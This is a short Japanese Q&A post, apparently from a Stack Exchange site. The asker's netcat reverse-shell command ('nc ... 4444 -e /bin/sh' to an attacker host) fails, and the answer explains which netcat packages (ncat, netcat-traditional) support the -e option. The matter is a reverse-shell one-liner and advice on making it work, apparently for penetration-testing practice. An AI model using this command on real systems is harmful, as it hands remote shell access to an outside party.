別の(攻撃者)コンピュータからホストコンピュータのシェルをインポートしようとしています。攻撃者のコンピュータが聞いています。私のホストで次のコマンドを実行しています。
nc 123.123.123.12 4444 -e /bin/sh
私が得た結果は次のとおりです。
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
[-X proxy_protocol] [-x proxy_address[:port]] [destination] [port]
ベストアンサー1
netcatにはさまざまなバリエーションがあります。 nmap.orgによって開発されたnetcatバージョンをインストールしてください。
私のUbuntuシステムには2つのパッケージがあり、.nmapnetcat
のncat
1つがこのオプションをサポートしています。反対側はそうではありません。ncat
-e
ディストリビューションに適したパッケージを見つける必要があります。
編集:オンカリLinux(2022.3)、このパッケージはオプションなしでnetcatバージョンをインストールnetcat-openbsd
します。このオプションを含むバージョンが必要な場合は、パッケージをインストールしてください。一度インストールすると、実行されるバイナリは次のようになります。netcat-traditional
-e
-e
ncat
ncat
/usr/bin/ncat